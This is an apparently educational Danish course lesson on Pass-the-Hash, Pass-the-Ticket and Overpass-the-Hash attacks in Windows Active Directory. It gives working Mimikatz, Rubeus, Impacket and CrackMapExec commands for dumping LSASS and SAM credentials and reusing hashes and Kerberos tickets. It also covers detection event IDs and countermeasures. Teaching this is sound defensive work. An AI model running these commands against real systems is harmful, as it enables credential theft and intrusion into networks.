Cyber Security Academy · Lektion

Pass-the-Hash- og Pass-the-Ticket-angreb

Brug credential-hashes og Kerberos-billetter til lateral bevægelse uden at kende adgangskoderne i klartekst.

Lektion 2 af 413 trin

Pass-the-Hash- og Pass-the-Ticket-angreb er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 2 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvorfor disse angreb findes

Windows' legitimationsprotokoller gemmer autentifikationshemmeligheder (NTLM-hasher og Kerberos-billetter) i hukommelsen. En angriber med SYSTEM-rettigheder kan udtrække disse hemmeligheder og genbruge dem til at autentificere som andre brugere uden at kende deres adgangskoder.

Udtrækning af NTLM-hasher med Mimikatz

Mimikatz er det førende værktøj til udtrækning af legitimationsoplysninger på Windows. Når det køres som SYSTEM/Administrator, læser det LSASS-processens hukommelse for at udtrække NTLM-hasher og legitimationsoplysninger i klartekst.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) med Mimikatz

PtH indsætter en NTLM-hash i en ny session uden at kende adgangskoden i klartekst. Hashen autentificerer over for fjerntjenester ved hjælp af NTLM — effektivt til lateral bevægelse til andre Windows-værter.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash med Impacket

Impacket indeholder Python-værktøjer til PtH: psexec.py, smbexec.py og wmiexec.py accepterer NTLM-hasher direkte til fjernudførelse af kommandoer.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Udtrækning af Kerberos-billetter

Kerberos-billetter gemmes også i LSASS-hukommelsen. Mimikatz udtrækker dem, mens Rubeus er det specialiserede værktøj til håndtering af Kerberos-billetter på Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT indsætter en stjålet Kerberos-billet i den aktuelle session. Billetten autentificerer over for tjenester som billettens oprindelige ejer — ingen hash eller adgangskode er nødvendig.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Fjernudtrækning af LSASS

Fra et etableret fodfæste kan du udtrække LSASS-fjernudtræk ved hjælp af CrackMapExec eller Impackets secretsdump — der kræves ingen interaktiv session på målet.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Veje til lateral bevægelse

Når du har indhentet hasher eller billetter, kan du bevæge dig lateralt: Brug PtH til andre maskiner, hvor lokale administratoradgangskoder genbruges, PtT til at få adgang til domænetjenester, og eskalér mod domæneadministrator ved at målrette privilegerede konti.

Registrering af PtH og PtT

Forsvarere registrerer PtH via: hændelses-id 4624 (logon) med logontype 3 uden et tilsvarende interaktivt logon, afvigelser i NTLM-autentifikation samt Mimikatz-signaturer i hukommelsen eller på disken.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Modforanstaltninger

Vigtige modforanstaltninger er: Aktivér Credential Guard (beskytter LSASS med virtualisering), begræns genbrug af lokale administratoradgangskoder på tværs af maskiner (LAPS), håndhæv gruppen Protected Users for privilegerede konti, og deaktivér NTLM, hvor det er muligt.

Overpass-the-Hash

Overpass-the-Hash konverterer en NTLM-hash til en Kerberos-TGT. Det er nyttigt i miljøer, hvor NTLM er blokeret, men Kerberos er tilgængelig, eller når du skal bruge en TGT til yderligere Kerberos-angreb.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Hurtigt tjek

Hvilken Windows-sikkerhedsfunktion beskytter legitimationsoplysninger i LSASS ved hjælp af virtualisering?

Opsummering: PtH og PtT

Pass-the-Hash og Pass-the-Ticket er grundlaget for lateral bevægelse i Active Directory. Begge udnytter Windows' caching af legitimationsoplysninger i LSASS. Mimikatz og Impacket gør udtrækning og genbrug trivielt. Forsvar dig med Credential Guard, LAPS, gruppen Protected Users og streng overvågning af NTLM- og Kerberos-autentifikationshændelser.

Gratis at komme i gang

Lær Cyber Security Academy med en AI-underviser — gratis

Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.

Kurser
76
Lektioner
303

Ofte stillede spørgsmål

Er lektionen “Pass-the-Hash- og Pass-the-Ticket-angreb” gratis?

Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Pass-the-Hash- og Pass-the-Ticket-angreb”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.

Hvad lærer jeg i “Pass-the-Hash- og Pass-the-Ticket-angreb”?

Brug credential-hashes og Kerberos-billetter til lateral bevægelse uden at kende adgangskoderne i klartekst. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.

Skal jeg have erfaring for at begynde på Cyber Security Academy?

Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 2 af 4.

Hvor lang tid tager lektionen “Pass-the-Hash- og Pass-the-Ticket-angreb”?

De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.

Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?

Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.

Alle lektioner i dette kursus

  1. Windows-autentificering: NTLM og Kerberos
  2. Pass-the-Hash- og Pass-the-Ticket-angreb
  3. Kerberoasting og AS-REP Roasting
  4. Hærdning af Active Directory
← Tilbage til Cyber Security Academy